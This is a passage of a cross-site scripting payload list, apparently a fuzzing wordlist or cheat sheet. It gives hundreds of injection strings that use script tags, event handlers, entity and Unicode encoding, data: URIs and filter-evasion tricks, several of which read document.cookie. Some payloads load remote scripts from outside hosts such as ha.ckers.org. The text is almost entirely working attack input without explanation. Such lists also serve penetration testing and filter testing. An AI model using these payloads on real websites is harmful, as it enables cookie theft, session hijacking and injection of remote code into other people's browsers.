+“><<script>alert(document.cookie);//<</script> +foo<script>alert(document.cookie)</script> +<scr<script>ipt>alert(document.cookie)</scr</script>ipt> +%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E +‘; alert(document.cookie); var foo=’ +foo\’; alert(document.cookie);//’; +</script><script >alert(document.cookie)</script> +<img src=asdf onerror=alert(document.cookie)> +<BODY ONLOAD=alert(’XSS’)> +<script>alert(1)</script> +"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> +<video src=1 onerror=alert(1)> +<audio src=1 onerror=alert(1)> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" +<script/src=data:,alert()> +<marquee/onstart=alert()> +<video/poster/onerror=alert()> +<isindex/autofocus/onfocus=alert()> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; +&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& +#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</script><script>alert('XSS');</script> +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*"); +xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" +veris-->group<svg/onload=alert(/XSS/)// +#"><img src=M onerror=alert('XSS');> +element[attribute='<img src=x onerror=alert('XSS');> +[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] +%22;alert%28%27RVRSH3LL_XSS%29// +javascript:alert%281%29; +<w contenteditable id=x onfocus=alert()> +alert;pg("XSS") +<svg/onload=%26%23097lert%26lpar;1337)> +<script>for((i)in(self))eval(i)(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> +<sCR<script>iPt>alert(1)</SCr</script>IPt> +<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> +<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<INPUT TYPE="BUTTON" action="alert('XSS')"/> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF +"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> +><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr +g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 +<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<iframe src=http://xss.rocks/scriptlet.html < +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe 